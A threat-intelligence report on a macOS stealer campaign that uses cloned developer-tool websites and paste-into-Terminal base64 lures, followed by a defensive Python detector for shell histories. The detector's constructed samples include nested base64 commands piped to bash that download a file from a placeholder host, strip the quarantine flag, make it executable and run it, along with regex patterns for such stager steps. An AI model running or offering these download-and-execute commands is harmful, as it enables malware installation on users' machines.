EXECUTIVE SUMMARY:
The Odyssey Stealer and AMOS (Atomic macOS Stealer) campaign is a coordinated malware distribution effort aimed at macOS developers through social engineering. Rather than exploiting software vulnerabilities, the operators trade on trust in familiar software by cloning the websites of Homebrew, TradingView, and LogMeIn. Visitors are instructed to copy a base64-encoded command from the fake page into Terminal; running it downloads and executes the stealer. The supporting infrastructure comprises more than 85 identified phishing domains linked by shared SSL certificates and long-lived IP addresses, which indicates an operation maintained over an extended period rather than a one-off campaign.
The technical investigation revealed a structured, persistent infrastructure behind the campaign. The primary IP address, registered under a personal name in Finland, hosted HTTP, SSH, and FTP services, suggesting it served both payload distribution and command-and-control. IMAPS and POP3S ports on the same host presented SSL certificates shared with a second node, tying the two together and showing that components are reused across campaigns. Together these findings point to a coordinated, multi-server environment built to sustain macOS malware activity. The cloned Homebrew and LogMeIn sites delivered payloads disguised as legitimate updates, after which Odyssey Stealer and AMOS exfiltrated credentials, system information, browser history, and cryptocurrency data. Flexible infrastructure, convincing branding, and payloads that leave little for signature-based detection to match on point to a professionally run operation designed for scale and stealth.
The Odyssey Stealer and AMOS campaign exemplifies a growing class of macOS-focused, socially engineered malware operations. By exploiting user trust in cloned developer tools, the operators sidestep the platform's built-in protections and deliver high-impact payloads without a single software vulnerability: Gatekeeper and notarization checks apply to downloaded application bundles, not to a command the user types into a shell, so those checks never see the payload. The reuse of long-lived infrastructure, consistent SSL certificates, and overlapping domain patterns shows that the attackers maintain an efficient ecosystem for sustained distribution; that persistence and recycling reflect both technical capability and adaptability. The campaign is a reminder that even a hardened macOS environment can be undermined by human factors, above all trust in open-source and widely recognized utilities. Verifying a domain before following its installation instructions, refusing to paste opaque encoded commands into a shell, and proactive threat intelligence monitoring remain essential for protecting developer environments against infrastructure-driven macOS threats.
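The lure described above reduces to one recognizable shape on the endpoint: a base64 blob is decoded and the result is handed to a shell, often through more than one layer. The following Python is an added example written for this report, not code from the researchers or from the malware, and it shows how a shell-history or EDR process-exec triage script can peel those layers, surface the embedded URLs and stager actions, and still pass benign uses of base64. The regular expressions, the sample commands, the hostname under the reserved .invalid TLD, and the file paths are all constructed assumptions for illustration, not indicators observed in the campaign.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Decoder spellings: macOS base64 historically required -D, newer builds also
# take -d; GNU coreutils uses -d/--decode. Matching only "-d" misses the
# macOS-native form a lure page is likely to use.
DECODE_RE = re.compile(r"\bbase64\s+(?:-D|-d|--decode)\b")
# Decoded output handed to an interpreter: "| bash", "|/bin/zsh", "| sh",
# or captured with $(...) and fed to eval / sh -c.
PIPE_SHELL_RE = re.compile(r"\|\s*(?:/bin/)?(?:ba|z)?sh\b")
EVAL_RE = re.compile(r"\b(?:eval|(?:ba|z)?sh\s+-c)\b[^\n]*\$\(")
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"|;)<>]+")
# Stager behaviour after download: fetch, mark executable, strip the
# quarantine attribute, load a LaunchAgent, drive AppleScript prompts.
STAGER_RE = re.compile(
    r"\b(?:curl|wget|chmod\s+\+x|xattr\s+-d|launchctl\s+(?:load|bootstrap)|osascript)\b"
)


@dataclass
class Verdict:
    suspicious: bool = False
    reasons: List[str] = field(default_factory=list)
    stages: List[str] = field(default_factory=list)  # decoded layers, outermost first
    urls: List[str] = field(default_factory=list)


def decode_blob(blob: str) -> Optional[str]:
    """Plaintext of a valid base64 blob that decodes to printable text, else None."""
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    if not all(ch.isprintable() or ch in "\n\r\t" for ch in text):
        return None
    return text


def inspect_command(command: str, max_depth: int = 4) -> Verdict:
    """Classify one command line as recorded in shell history or an EDR exec log."""
    v = Verdict()
    current = command
    for _ in range(max_depth):  # peel nested layers: a stager that decodes to another decoder
        if not DECODE_RE.search(current):
            break
        decoded = [t for t in map(decode_blob, B64_RE.findall(current)) if t]
        if not decoded:
            break
        current = "\n".join(decoded)
        v.stages.append(current)
    if DECODE_RE.search(command) and (PIPE_SHELL_RE.search(command) or EVAL_RE.search(command)):
        v.reasons.append("base64 payload decoded and executed by a shell")
    for depth, text in enumerate(v.stages, start=1):
        v.urls.extend(URL_RE.findall(text))
        hits = sorted({m.group(0) for m in STAGER_RE.finditer(text)})
        if hits:
            v.reasons.append(f"stage {depth} shows stager behaviour: {', '.join(hits)}")
        if PIPE_SHELL_RE.search(text) or EVAL_RE.search(text):
            v.reasons.append(f"stage {depth} pipes further decoded content into a shell")
    if len(v.stages) > 1:
        v.reasons.append(f"{len(v.stages)} nested base64 layers")
    v.suspicious = bool(v.reasons)
    return v


def b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


# Constructed samples, not captured from the campaign. The host is a placeholder
# under the reserved .invalid TLD and the paths are made up.
INNER = ("curl -fsSL https://update.example.invalid/dl/.ody -o /tmp/.ody "
         "&& xattr -d com.apple.quarantine /tmp/.ody; chmod +x /tmp/.ody && /tmp/.ody")
MIDDLE = f"echo {b64(INNER)} | base64 -d | sh"
SAMPLES: Dict[str, str] = {
    "brew": "brew install wget",
    "encode": "printf 'user:pass' | base64",
    "benign_decode": f"echo {b64('hello from a harmless base64 round trip')} | base64 -d > note.txt",
    "lure": f'echo "{b64(MIDDLE)}" | base64 -D | bash',
    "eval": f'eval "$(echo {b64(INNER)} | base64 --decode)"',
}


def scan_samples() -> Dict[str, Verdict]:
    return {name: inspect_command(cmd) for name, cmd in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in scan_samples().items():
        print(f"{name:14s} {'SUSPICIOUS' if verdict.suspicious else 'ok'}")
        for reason in verdict.reasons:
            print(f"    - {reason}")
        for url in verdict.urls:
            print(f"    url: {url}")
```

The decision is deliberately not "base64 -d is present": the benign_decode sample is decoded and found harmless, while the lure is flagged on three independent grounds (decode piped to a shell, a second decode layer inside the first, and curl/xattr/chmod in the innermost stage), so removing any one trick from the lure does not clear it. Extracted URLs are what you pivot on when hunting for the cloned sites and their shared certificates.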
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
| --- | --- | --- | --- |
| Initial Access | T1566.003 | Phishing | Spearphishing via Service |
| Execution | T1059.004 | Command and Scripting Interpreter | Unix Shell |
| Persistence | T1543.001 | Create or Modify System Process | Launch Agent |
| Credential Access | T1555.003 | Credentials from Password Stores | Credentials from Web Browsers |
| Collection | T1005 | Data from Local System | - |
| Command and Control | T1071.001 | Application Layer Protocols | Web Protocols |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | - |
MBC MAPPING:
| Objective | Behaviour ID | Behaviour |
| --- | --- | --- |
| Execution | E1204 | User Execution |
| Persistence | F0012 | Registry Run Keys / Startup Folder |
| Collection | F0002 | Keylogging |
| Collection | E1113 | Screen Capture |
| Communication Micro-objective | C0002 | HTTP Communication |
REFERENCES:
The following reports contain further technical details: